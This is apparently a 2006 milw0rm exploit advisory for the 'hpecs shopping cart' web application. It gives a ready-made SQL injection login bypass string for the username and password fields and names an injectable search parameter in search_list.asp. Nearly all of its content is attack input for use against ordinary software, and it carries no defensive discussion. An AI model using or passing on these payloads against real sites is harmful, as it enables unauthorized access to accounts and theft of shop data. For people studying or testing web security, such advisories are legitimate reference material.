22 lines
No EOL
417 B
Text
22 lines
No EOL
417 B
Text
vendor site:http://hpe.net/
|
|
product:hpecs shopping cart
|
|
bug:injection sql
|
|
risk:high
|
|
|
|
|
|
login bypass :
|
|
username: 'or''='
|
|
passwd: 'or''='
|
|
|
|
injection sql (post) :
|
|
|
|
http://site.com/search_list.asp
|
|
variables:
|
|
Hpecs_Find=maingroup&searchstring='[sql]
|
|
( or just post your query in the search engine ... )
|
|
|
|
laurent gaffié & benjamin mossé
|
|
http://s-a-p.ca/
|
|
contact: saps.audit@gmail.com
|
|
|
|
# milw0rm.com [2006-11-14] |